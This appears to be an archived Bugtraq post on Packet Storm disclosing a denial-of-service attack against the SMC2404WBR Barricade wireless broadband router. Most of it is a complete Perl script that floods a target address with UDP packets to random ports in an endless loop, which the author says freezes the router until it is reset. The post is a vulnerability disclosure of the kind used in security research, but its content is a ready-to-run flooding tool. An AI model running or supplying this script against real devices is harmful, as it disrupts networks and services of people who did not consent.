Exploit that causes a denial of service against the SMC2404WBR BarricadeT Turbo 11/22 Mbps wireless cable/dsl broadband router by sending random UDP packets to multiple ports.
90a530b5dfa8a1cfd55a585196bee3b8a7fcb9d85ee26a46d30fb0ccb6f67ca1From: <res076cf@alltel.net>
To: bugtraq@securityfocus.com
Subject: SMC Router Denial of Service exploit
Howdy,
Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL
Broadband Router.
Sending a stream of UDP random packets to multiple ports 0-65000 on the
router will cause the router to freeze until a soft reset is performed on
it. In one case, the router did survive but did not come back "alive" for
around 15 minutes. All other tries (2 others) the router had to be reset.
This attack was performed using the Zonealarm+Windows 98 DoS code written by
_6mO_HaCk.
The code follows:
-----------------snip---------------------
#!/usr/bin/perl
use Socket;
system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}
-----------------------snip--------------------------------------
Dave, put down the Windows disk Dave. Dave? DAVE?!!? - Hal9000
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed